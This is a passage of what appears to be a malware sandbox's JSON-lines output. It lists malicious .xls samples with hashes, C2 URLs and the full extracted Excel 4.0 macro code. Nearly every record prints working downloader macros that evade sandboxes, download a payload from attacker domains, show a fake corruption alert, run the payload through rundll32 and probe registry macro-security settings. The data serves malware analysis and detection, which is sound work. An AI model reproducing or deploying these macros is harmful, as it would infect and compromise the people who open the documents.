CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Ro3dLzXoK9\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a347146849d3b7f7e2452c1af9b74823e45dbf255e6ae477670ddccd4b14582a"},"analysis":{"reported":"2020-04-09T16:18:05Z","score":10},"files":[{"filename":"a347146849d3b7f7e2452c1af9b74823e45dbf255e6ae477670ddccd4b14582a","filesize":132608,"md5":"819fa6a9602d0863283596e2665886cc","sha1":"511a555d26c264a73ddccdc921245239b89d9456","sha256":"a347146849d3b7f7e2452c1af9b74823e45dbf255e6ae477670ddccd4b14582a","sha512":"05deffc3f854dd62dd2569ad462db3a25ece47295060cd66977af52c305257c744c13a55814734ebd8c600675865cd5433a3b9a1c6b7c7348a19e79a287e5c60","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a347146849d3b7f7e2452c1af9b74823e45dbf255e6ae477670ddccd4b14582a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VfLMWXyInf\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a34767508f3703c5bfb41226a2dfaffb2a99af6dd273c5f00613689a0286a69d"},"analysis":{"reported":"2020-04-09T16:18:05Z","score":10},"files":[{"filename":"a34767508f3703c5bfb41226a2dfaffb2a99af6dd273c5f00613689a0286a69d","filesize":160768,"md5":"7893ea17e3b1ba9a55816c2e3cdf701a","sha1":"c99edc2e86fc7039d783736a1a4065d626cee87c","sha256":"a34767508f3703c5bfb41226a2dfaffb2a99af6dd273c5f00613689a0286a69d","sha512":"869098dc0c36906a33c432e99189ca1e639dc14af3a3c4a5637580d293dd3ef128712f915c730058afdd744a7d7097f19003b10fada85d9aa8bfbf01aeb57d97","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a34767508f3703c5bfb41226a2dfaffb2a99af6dd273c5f00613689a0286a69d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WAc78BhmaC\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a3571a0e5aefbdb05a77afbf95fa1a58333788fd93420c2b359aaba5f4aafc4a"},"analysis":{"reported":"2020-04-09T16:18:05Z","score":10},"files":[{"filename":"a3571a0e5aefbdb05a77afbf95fa1a58333788fd93420c2b359aaba5f4aafc4a","filesize":104448,"md5":"c90dbd0064d2579d21b75cec2b592224","sha1":"c54a858bcc2b138576986e247c6477d3a110754f","sha256":"a3571a0e5aefbdb05a77afbf95fa1a58333788fd93420c2b359aaba5f4aafc4a","sha512":"13079e6269a193e29a69b041b3c3e229183a04c5c5c25b2eb66850e1d87201326dbeee0fe2b940e2213510ca29d97fe67a2c02875e3c36e9b07970af55ad2e92","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a3571a0e5aefbdb05a77afbf95fa1a58333788fd93420c2b359aaba5f4aafc4a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"2XNUlgO7jP\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a3606335f9e2c84b104d09447bc94eb1d514ab519b7d81b45ea07b1556474eec"},"analysis":{"reported":"2020-04-09T16:18:05Z","score":10},"files":[{"filename":"a3606335f9e2c84b104d09447bc94eb1d514ab519b7d81b45ea07b1556474eec","filesize":141824,"md5":"41f3838c59cebcd291edd91024e39e85","sha1":"8fac224f9f89d6957e2a5a0c80714153acae9d73","sha256":"a3606335f9e2c84b104d09447bc94eb1d514ab519b7d81b45ea07b1556474eec","sha512":"ca875583ebf11d68f64a08c35a1af8189fe5766f86b228c72f16a9f16a4191e8d13272a0357003d8e86faa4a5d15971b579929bb26d2fe6bd96542870f33ba79","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a3606335f9e2c84b104d09447bc94eb1d514ab519b7d81b45ea07b1556474eec.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"vz7jxlM15m\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a3736acecc36dbf849a7b3b21de51afb8b49750ff4b9ee66769b4f3d523f58b6"},"analysis":{"reported":"2020-04-09T16:18:05Z","score":10},"files":[{"filename":"a3736acecc36dbf849a7b3b21de51afb8b49750ff4b9ee66769b4f3d523f58b6","filesize":167936,"md5":"413bc5b3f8973820aa1cd3b17ed2121f","sha1":"89fdb029f356cf068ca76b8925131c7c309d4023","sha256":"a3736acecc36dbf849a7b3b21de51afb8b49750ff4b9ee66769b4f3d523f58b6","sha512":"fe0ae8d8c9ab598d2279edbba26ec4a63588528ca652eaa4dd655884882bde4249fa8b3ffb9aa87296cd428817c467036831272bef143510a32aa58bb3c15640","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a3736acecc36dbf849a7b3b21de51afb8b49750ff4b9ee66769b4f3d523f58b6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ybyK6qn9wl\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a37f56d8bfcb3d7206dbb2540f1483e2634384cddb258b6e542468e73ae91c74"},"analysis":{"reported":"2020-04-09T16:18:05Z","score":10},"files":[{"filename":"a37f56d8bfcb3d7206dbb2540f1483e2634384cddb258b6e542468e73ae91c74","filesize":112128,"md5":"64b1a1c1ed1b45518da3a27e3b609bc0","sha1":"7ed54f7783800d7b63baf121c51c441addf5d8d0","sha256":"a37f56d8bfcb3d7206dbb2540f1483e2634384cddb258b6e542468e73ae91c74","sha512":"6797097f860a7ede7f1cc2efc7d6a8c05128a327a0228d88ab3c71cd0b6fd1697196dd94e8a9731164779c8bad44e5d671c8a4ae62784b1c09610b8c853fbafe","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a37f56d8bfcb3d7206dbb2540f1483e2634384cddb258b6e542468e73ae91c74.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a39f0e2ef2ac7d800fe19f20d471f87df109f6794271152091042d3410202de2"},"analysis":{"reported":"2020-04-09T16:18:05Z","score":10},"files":[{"filename":"a39f0e2ef2ac7d800fe19f20d471f87df109f6794271152091042d3410202de2","filesize":185344,"md5":"7bce2e3e3eb720f677a9bc78825b3d1f","sha1":"fe846f6db29747f5b75e04ffc44c2572cc6c77c2","sha256":"a39f0e2ef2ac7d800fe19f20d471f87df109f6794271152091042d3410202de2","sha512":"0e52b09a83f428514e9d76582b88d0254aecc738c1dd6f17cb3a6e7c12f99481d4cf6cbb629bf6e81d8b6ed939f575dcb087ef72229fa26b55df027c416fa249","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a39f0e2ef2ac7d800fe19f20d471f87df109f6794271152091042d3410202de2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a3ac3b9d718f44f904f780fde7d2072fd14275ef45d2e2d37f246b987d820754"},"analysis":{"reported":"2020-04-09T16:18:05Z","score":10},"files":[{"filename":"a3ac3b9d718f44f904f780fde7d2072fd14275ef45d2e2d37f246b987d820754","filesize":221184,"md5":"82076bf7a15fc86e0a1a3131c875be02","sha1":"655d1de392b661565affc87884f66e19fbb70357","sha256":"a3ac3b9d718f44f904f780fde7d2072fd14275ef45d2e2d37f246b987d820754","sha512":"5f6c63033408eb485a6b879b6957f34737601c00b328157161cacc38480573ba548c7c9a4e119bd6dbf5b2014419862a5da739a8a2c0671137b471e1ad7263e1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a3ac3b9d718f44f904f780fde7d2072fd14275ef45d2e2d37f246b987d820754.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"hbJoukjSvj\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a3b572f9209c3c9b7d5dc7a9a7511bf439e25dd258a35ec595898c14a4ae0f3b"},"analysis":{"reported":"2020-04-09T16:18:05Z","score":10},"files":[{"filename":"a3b572f9209c3c9b7d5dc7a9a7511bf439e25dd258a35ec595898c14a4ae0f3b","filesize":167936,"md5":"0a15a91cd018e36ffacd3b6f3fc915ee","sha1":"de8ccf992926831a1504437425446764186c6870","sha256":"a3b572f9209c3c9b7d5dc7a9a7511bf439e25dd258a35ec595898c14a4ae0f3b","sha512":"a645486e8776fd8d9ba7b6e0bc80cec8294af2d7aee44ee5641564a9b0de8cbf978a765b06a9bd772b57c205740f70199daf8d69f920a6f77920aa6a869bd3d6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a3b572f9209c3c9b7d5dc7a9a7511bf439e25dd258a35ec595898c14a4ae0f3b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5wacGK7wVF\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a3bbdbff3fd24c735a7ecc6b9fae294bc0530537950c1d118ae7f025c180c4c4"},"analysis":{"reported":"2020-04-09T16:18:06Z","score":10},"files":[{"filename":"a3bbdbff3fd24c735a7ecc6b9fae294bc0530537950c1d118ae7f025c180c4c4","filesize":104448,"md5":"7ce8526ac2b16f1315da1c71aae339fe","sha1":"33ef54dc99bd292ff99f00387a90c51d33b3ed66","sha256":"a3bbdbff3fd24c735a7ecc6b9fae294bc0530537950c1d118ae7f025c180c4c4","sha512":"0cdef7278c366027a39aa850eef1d04b6d8c454a2aa4f5ebf039b373c0ea7a537f7c47e0d4575ba24001c9eac6c0fffe09a52578c0657069e693ed95beda26e8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a3bbdbff3fd24c735a7ecc6b9fae294bc0530537950c1d118ae7f025c180c4c4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"9dZf7PSDJr\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a3bc2bfb79d913e29aade28c19c44aec517f076a61658e38b2df04196ff8e0ad"},"analysis":{"reported":"2020-04-09T16:18:06Z","score":10},"files":[{"filename":"a3bc2bfb79d913e29aade28c19c44aec517f076a61658e38b2df04196ff8e0ad","filesize":152576,"md5":"a3c5c386f485962605877440a4f9eace","sha1":"83e26b7d756f1d9afae2713de6c86cc39d2c0893","sha256":"a3bc2bfb79d913e29aade28c19c44aec517f076a61658e38b2df04196ff8e0ad","sha512":"b3c448e2876e5beb5874b79ade4b5592d4e459f68bd3c35956378ff31613d8142dd0d7220c71ab405253a923c33f5b6adef04edfe94de797c2ddbc8489f497bb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a3bc2bfb79d913e29aade28c19c44aec517f076a61658e38b2df04196ff8e0ad.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rIgjXYMoCn\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a3d558bebef980e53714b862ba7b8ed699b74e63379c99877ead8a7145f7ce0e"},"analysis":{"reported":"2020-04-09T16:18:06Z","score":10},"files":[{"filename":"a3d558bebef980e53714b862ba7b8ed699b74e63379c99877ead8a7145f7ce0e","filesize":206336,"md5":"543f3372c8ea5b3a9020a195cd44d48b","sha1":"c41948641c233fb5856e920c047a7b8ddf3d5eda","sha256":"a3d558bebef980e53714b862ba7b8ed699b74e63379c99877ead8a7145f7ce0e","sha512":"1b0637cf54d757a41f132693d15a4d9e5dee0814f181c767e1c35861be972253d2a97985964a60c62ecf9978084a07c5270ce10d53bec2a3cd2d94090423effe","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a3d558bebef980e53714b862ba7b8ed699b74e63379c99877ead8a7145f7ce0e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"kCZbJVlwau\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a3f8cd311b2d3f306be47d7b804d6bc0d1332233189d503baf95b59d28e82aa9"},"analysis":{"reported":"2020-04-09T16:18:06Z","score":10},"files":[{"filename":"a3f8cd311b2d3f306be47d7b804d6bc0d1332233189d503baf95b59d28e82aa9","filesize":168448,"md5":"e50994e9aef61c913697e76a2ef21df0","sha1":"ee0e4a2cfdbea960f83fc0a26cc4c2c19b28b403","sha256":"a3f8cd311b2d3f306be47d7b804d6bc0d1332233189d503baf95b59d28e82aa9","sha512":"0178e342fe795e8246d7d32062aca1d29ad31242caef33c66cc80f7f86a4ad40ed5b80ef49da60fdaadbbfb7a1076cc3cdc71ad1df67dc2867535c14a920ee0c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a3f8cd311b2d3f306be47d7b804d6bc0d1332233189d503baf95b59d28e82aa9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GIP7ugP3YX\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a400812653ba83ffec93f5f847c5cedf013f84b9e7da63a401c4ff70d9faf851"},"analysis":{"reported":"2020-04-09T16:18:06Z","score":10},"files":[{"filename":"a400812653ba83ffec93f5f847c5cedf013f84b9e7da63a401c4ff70d9faf851","filesize":214016,"md5":"d80a9d62c500a309dcd2b0a1ef2d0d68","sha1":"2a697395ebfc36b3ada08183c8e0fe27d5bf5e93","sha256":"a400812653ba83ffec93f5f847c5cedf013f84b9e7da63a401c4ff70d9faf851","sha512":"2f0506917058af27b76a8a5fe595aed16c72ac6d77a5a5c83b89f05d8244211fc01cd9c72d58ed1da7b03240f72f7ad7a9ef6579809326461b0fba9a9cde6a76","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a400812653ba83ffec93f5f847c5cedf013f84b9e7da63a401c4ff70d9faf851.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JLeBkqub1d\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a407954e555ad22a4d392f772da8ab0512e341608444ec2633e41198609c4929"},"analysis":{"reported":"2020-04-09T16:18:06Z","score":10},"files":[{"filename":"a407954e555ad22a4d392f772da8ab0512e341608444ec2633e41198609c4929","filesize":206336,"md5":"a8d65adbb91dbad9d689de8d9e7874b2","sha1":"dc1b26eab40928f0af5f2167698aebfb3ab692f2","sha256":"a407954e555ad22a4d392f772da8ab0512e341608444ec2633e41198609c4929","sha512":"60bdbcbfed9daded16a72d1cb5826758eb6c09eb8c916eb99897e3384acb66865d5f3726a0006d54377b3d170525576ef00f03d79571d6ab052470ad6f651b88","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a407954e555ad22a4d392f772da8ab0512e341608444ec2633e41198609c4929.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, 